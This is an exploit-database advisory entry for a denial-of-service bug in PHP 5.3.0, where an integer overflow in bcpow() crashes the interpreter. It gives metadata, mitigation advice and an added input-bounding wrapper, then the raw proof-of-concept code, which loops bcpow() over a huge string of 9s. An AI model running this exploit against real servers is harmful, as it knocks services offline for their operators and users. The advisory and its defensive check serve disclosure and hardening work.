Vendor: PHP
By: ITSecTeam
CVSS: 7,5 HIGH
Denial of Service (DoS)
CWE: 190
Product Name: PHP
Affected Version From: 5.3.0
Affected Version To: 5.3.0
Patch Exists: YES
Related CWE: N/A
CPE: a:php:php:5.3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 and Redhat
2010

Dos Php 5.3.0

This is a Denial of Service (DoS) vulnerability in PHP 5.3.0, caused by an integer overflow in the bcpow() function. The exploit code builds a large string of 9s and passes it to bcpow(), which triggers the integer overflow and results in a crash. The code is written in PHP and was coded by Pejvak.

Mitigation:

Upgrade to the latest version of PHP.
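
As a defence-in-depth check alongside the upgrade, untrusted operands can be bounded before they reach bcpow(). This is an added example, not part of the original advisory or of PHP itself; the wrapper name bounded_bcpow() and both limits are assumptions, and it is written without scalar type declarations so it also parses on PHP 5.x.

```php
<?php
// Added example: bound bcmath operands before calling bcpow().
// Both limits are assumed values; tune them to what the application needs.
const MAX_OPERAND_DIGITS = 1000;
const MAX_RESULT_DIGITS  = 100000;

// Hypothetical wrapper: validates untrusted input, rejects calls whose
// result would be unreasonably large, then delegates to bcpow().
function bounded_bcpow($base, $exp, $scale = 0)
{
    if (!is_string($base) || !is_string($exp) || !is_int($scale)) {
        throw new InvalidArgumentException('unexpected argument type');
    }
    // Accept only plain decimals: optional sign, digits, optional fraction.
    if (!preg_match('/^[+-]?\d+(\.\d+)?$/D', $base)) {
        throw new InvalidArgumentException('base is not a decimal number');
    }
    // bcpow() takes an integer exponent; keep it short enough to cast safely.
    if (!preg_match('/^-?\d{1,6}$/D', $exp)) {
        throw new InvalidArgumentException('exponent is not a small integer');
    }
    if ($scale < 0 || $scale > 100) {
        throw new InvalidArgumentException('scale out of range');
    }

    // Count digits only, ignoring sign and decimal point.
    $digits = strlen(preg_replace('/\D/', '', $base));
    if ($digits > MAX_OPERAND_DIGITS) {
        throw new LengthException("base has $digits digits, limit is " . MAX_OPERAND_DIGITS);
    }

    // Upper bound on the exact result length: digits(base) * |exponent|.
    $estimate = $digits * max(1, abs((int) $exp));
    if ($estimate > MAX_RESULT_DIGITS) {
        throw new LengthException("result would need about $estimate digits");
    }

    return bcpow($base, $exp, $scale);
}

// Constructed inputs: a normal call, then an oversized all-9s operand.
echo bounded_bcpow('12', '3', 2), PHP_EOL;
try {
    bounded_bcpow(str_repeat('9', 5000), '3', 2);
} catch (LengthException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The check runs on string length alone, so an oversized operand is rejected before any arbitrary-precision arithmetic is attempted.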

Exploit-DB raw data:

//#DOS Php 5.3.x
//###########################################################################
//#Title: Dos Php 5.3.0
//#Vendor: http://php.net
//#Tested On Php 5.3.0 On Windows xp Sp3 And Redhat
//###########################################################################
//#AUTHOR: ITSecTeam
//#Email: Bug@ITSecTeam.com
//#Website: http://www.itsecteam.com
//#Forum : http://forum.ITSecTeam.com
//#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability34.htm
//#Thanks: Pejvak,M3hr@nS,r3dm0v3,am!rkh@n
//###########################################################################
//#
//# Exploit
//###########################################################################
<?php
$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
for($i=0;$i<2;){
$buff=bcpow($junk, '3', 2);
$buff=null;
}
//Coded By Pejvak;
?>